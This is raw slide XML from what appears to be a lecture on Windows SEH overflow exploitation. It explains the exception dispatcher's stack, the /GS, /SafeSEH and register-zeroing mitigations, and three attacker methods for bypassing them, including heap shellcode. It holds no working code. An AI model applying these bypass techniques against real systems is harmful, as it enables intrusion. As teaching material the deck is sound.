          <p:cNvCxnSpPr>
            <a:stCxn id="595" idx="1"/>
            <a:endCxn id="595" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2769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7" name="Shape 597"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="29575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8" name="Shape 598"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="34147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9" name="Shape 599"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="37957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0" name="Shape 600"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="42529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1" name="Shape 601"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877225" y="35717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0x01234FE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0x0ABCFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Shape 602"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182025" y="5171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0x01235A6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0x0ABD0F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="603" name="Shape 603"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877225" y="42168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4" name="Shape 604"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182025" y="5817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5" name="Shape 605"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335525" y="24514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606" name="Shape 606"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2716525" y="40516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607" name="Shape 607"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021325" y="55756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Stack changes after jumping to the exception dispatcher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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Shape 614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572700" y="2461341"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context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 Context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6351850" y="1846000"/>
            <a:ext cx="2302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Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="616" name="Shape 616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2123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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="617" name="Shape 617"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="616" idx="1"/>
            <a:endCxn id="616" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2769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8" name="Shape 618"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="29575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9" name="Shape 619"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="34147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0" name="Shape 620"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="37957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1" name="Shape 621"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="42529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2" name="Shape 622"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877225" y="35717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0x01234FE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0x0ABCFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="623" name="Shape 623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182025" y="5171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0x01235A6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0x0ABD0F</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="624" name="Shape 624"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877225" y="42168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5" name="Shape 625"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182025" y="5817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6" name="Shape 626"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2335525" y="24514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627" name="Shape 627"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2716525" y="40516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628" name="Shape 628"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441500" y="2383733"/>
            <a:ext cx="4128675" cy="702875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="28115" w="165147">
                <a:moveTo>
                  <a:pt x="0" y="28115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8270" y="23483"/>
                  <a:pt x="22098" y="2641"/>
                  <a:pt x="49623" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77147" y="-1989"/>
                  <a:pt x="145893" y="11904"/>
                  <a:pt x="165147" y="1422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29" name="Shape 629"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5885375" y="3017125"/>
            <a:ext cx="655025" cy="1677275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="67091" w="26201">
                <a:moveTo>
                  <a:pt x="25407" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8337" y="15086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14292" y="28980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="33744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13895" y="38111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11116" y="57960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26201" y="67091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30" name="Shape 630"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4575300" y="3245400"/>
            <a:ext cx="13596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4 arguments get loaded on the stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Shape 631"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3021325" y="5575600"/>
            <a:ext cx="425500" cy="1131425"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="45257" w="17020">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2712" y="3837"/>
                  <a:pt x="13960" y="15483"/>
                  <a:pt x="16276" y="23026"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18591" y="30568"/>
                  <a:pt x="14291" y="41551"/>
                  <a:pt x="13894" y="452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</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Shape 63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Stack changes after jumping to the exception dispatcher</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Shape 638"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572700" y="2461341"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context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 Context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6351850" y="1846000"/>
            <a:ext cx="2302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Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="640" name="Shape 640"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2123910"/>
            <a:ext cx="1915500" cy="12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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="641" name="Shape 641"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="640" idx="1"/>
            <a:endCxn id="640" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="2769060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2" name="Shape 642"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="29575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3" name="Shape 643"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="34147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4" name="Shape 644"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="37957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5" name="Shape 645"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6590025" y="425297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6" name="Shape 646"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2441500" y="2383733"/>
            <a:ext cx="4128675" cy="702875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="28115" w="165147">
                <a:moveTo>
                  <a:pt x="0" y="28115"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8270" y="23483"/>
                  <a:pt x="22098" y="2641"/>
                  <a:pt x="49623" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="77147" y="-1989"/>
                  <a:pt x="145893" y="11904"/>
                  <a:pt x="165147" y="1422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47" name="Shape 647"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2431575" y="2580425"/>
            <a:ext cx="4128675" cy="1059625"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="42385" w="165147">
                <a:moveTo>
                  <a:pt x="165147" y="40493"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="149532" y="40493"/>
                  <a:pt x="93623" y="44529"/>
                  <a:pt x="71458" y="40493"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49292" y="36457"/>
                  <a:pt x="44065" y="23025"/>
                  <a:pt x="32156" y="16277"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20246" y="9528"/>
                  <a:pt x="5359" y="2712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triangle"/>
            <a:tailEnd len="lg" w="lg" type="diamond"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="648" name="Shape 648"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4059225" y="3603350"/>
            <a:ext cx="2362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establisher frame argument is populated with a pointer to the address for the corresponding on the program stack </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>  *Next SEH record pointer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(i.e. not 0x0123456 in this case, but the actual address of that entry on the stack)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since its on the stack, it can be overflowed as well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When overflowing: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SEH values occur before the RET value on the stack, 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Even if no exception handling was coded, every thread has one handler set up on thread initialization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Double the fun!  (double the ways to hijack EIP)!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overflowed (IDA pro view)</a:t>
            </a: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id="661" name="Shape 6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04688"/>
            <a:ext cx="8235240" cy="433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Overflow Mitigation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i="1" lang="en" sz="2400"/>
              <a:t>But the SEH designers knew about stack overflows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Smash the Stack for Fun &amp; Profit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t> was out for a while by then</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>So they implemented some protections against it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Since Windows XP SP1, </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2400"/>
              <a:t>before the exception handler is called</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>: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b="1" lang="en" sz="2400"/>
              <a:t>all registers are XORed to = zero</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="133333"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>makes exploit development a little difficult in some cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="133333"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>cannot jump to instructions that do things like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="133333"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>call EAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="4" marL="2286000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="133333"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>jmp EBX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Overflow Mitigation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457200" y="1704688"/>
            <a:ext cx="40215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360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>More since Windows 2003 Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2000"/>
              <a:t>/GS cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>run time random values used to pad overflow targets on the stack (i.e. the RET addr), for detecting overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>cookie value stored in .data section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-355600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>can be overwritten!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4" name="Shape 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25" y="1982344"/>
            <a:ext cx="4006575" cy="460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Overflow Mitigation</a:t>
            </a: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360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>More since Windows 2003 Server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>/safeSEH - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>a more robust SEH implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>SE Handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>'s address is checked beforehand, against the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="2400"/>
              <a:t>list of registered handlers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>if no match, then it will not be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>also if the address points to the stack, no execution...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>But will execute if address points to the heap!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400"/>
              <a:t>A flaw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400"/>
              <a:t>: if the address of the handler is outside the address range of the loaded module, then it is still executed...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="133333"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  (Great read!) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="681" name="Shape 681"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245472" y="4368333"/>
            <a:ext cx="1438500" cy="1110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0x0ABCDE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="682" name="Shape 682"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="245472" y="4906619"/>
            <a:ext cx="143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3" name="Shape 683"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179400" y="4058166"/>
            <a:ext cx="1796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Program stack (top record)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of mitigation limitations</a:t>
            </a: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say an attacker has done the following in an overflow, (just for example):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98820"/>
            <a:ext cx="6053734" cy="4349433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5031850" y="2183450"/>
            <a:ext cx="1379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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168391" y="2431221"/>
            <a:ext cx="2322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redirected to stack shellcode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4168391" y="3345621"/>
            <a:ext cx="2322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redirected to heap shellcode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4168391" y="4260021"/>
            <a:ext cx="2322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redirected to other module's code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="695" name="Shape 695"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143425" y="3414125"/>
            <a:ext cx="585550" cy="754275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="30171" w="23422">
                <a:moveTo>
                  <a:pt x="0" y="22231"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4764" y="30171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23422" y="0"/>
                </a:ln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96" name="Shape 696"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6143425" y="4328525"/>
            <a:ext cx="585550" cy="754275"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="30171" w="23422">
                <a:moveTo>
                  <a:pt x="0" y="22231"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4764" y="30171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23422" y="0"/>
                </a:ln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697" name="Shape 697"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033491" y="2951121"/>
            <a:ext cx="436800" cy="43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8" name="Shape 698"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6033491" y="2951121"/>
            <a:ext cx="436800" cy="43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Dear god Why?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04688"/>
            <a:ext cx="8209761" cy="46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methods for bypassing overflow mitigations for SEH</a:t>
            </a:r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are 3 similar options for an attacker to bypass </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>/SafeSEH, /GS cookies, and XORed out registers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>for attacking SEH in Windows.  They only really differ in what the attacker does to the SEH record pointer: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Hijack EIP by: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overwrite the cookie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.data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> section to sabotage /GS checks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Overflow a local buffer to overwrite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EXCEPTION_REGISTRATION</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> structure (AKA: the SEH record structure)</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t> to either</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>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(1) set the pointer to an already registered handler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then abuse that to gain control somehow (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>uncommon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(2) overwrite the pointer with an address that is outside the range of the loaded module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shared libraries (.dll's) are modules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perhaps inject a .dll into the process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Note: this may have changed in recent versions of Windows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(3) load shellcode onto the heap, and overwrite the pointer to go there (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>we'll cover this later</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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perhaps also the RET value on the stack in the overflow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Jumping to another module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(#2)</a:t>
            </a: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This is the most common approach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However shellcode is usually not there!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would require more exploitation (more difficult!)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The address that the SE handler (i.e. 0x0ABCDE) gets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jmp / call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ed by the exception dispatcher function, with the following stack set up:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="711" name="Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3600900" y="4126491"/>
            <a:ext cx="2114100" cy="2292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ESP RET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Establisher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Context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 Context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3380050" y="3511150"/>
            <a:ext cx="2302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Dispatcher's Stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="46227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4" name="Shape 714"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="50799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5" name="Shape 715"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="54609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6" name="Shape 716"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3618225" y="59181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7" name="Shape 717"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4000335"/>
            <a:ext cx="1915500" cy="147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</p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="718" name="Shape 718"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="496225" y="4717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9" name="Shape 719"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408250" y="35873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sp>
        <p:nvSpPr>
          <p:cNvPr id="720" name="Shape 720"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2411725" y="4444621"/>
            <a:ext cx="1190950" cy="728875"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="29155" w="47638">
                <a:moveTo>
                  <a:pt x="0" y="27856"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="2911" y="27723"/>
                  <a:pt x="13497" y="31164"/>
                  <a:pt x="17467" y="27062"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21436" y="22959"/>
                  <a:pt x="18790" y="7741"/>
                  <a:pt x="23819" y="3242"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="28847" y="-1257"/>
                  <a:pt x="43668" y="595"/>
                  <a:pt x="47638" y="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21" name="Shape 721"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480850" y="3096525"/>
            <a:ext cx="1585700" cy="2243000"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="89720" w="63428">
                <a:moveTo>
                  <a:pt x="42081" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="45521" y="8601"/>
                  <a:pt x="60938" y="37780"/>
                  <a:pt x="62725" y="51609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="64511" y="65437"/>
                  <a:pt x="63254" y="76619"/>
                  <a:pt x="52800" y="82971"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="42345" y="89322"/>
                  <a:pt x="8800" y="88595"/>
                  <a:pt x="0" y="8972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22" name="Shape 722"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5746425" y="4624925"/>
            <a:ext cx="664950" cy="1766600"/>
          </a:xfrm>
          <a:custGeom>
            <a:pathLst>
              <a:path extrusionOk="0" h="70664" w="26598">
                <a:moveTo>
                  <a:pt x="2382" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15880" y="8337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11513" y="25805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26598" y="30965"/>
                </a:lnTo>
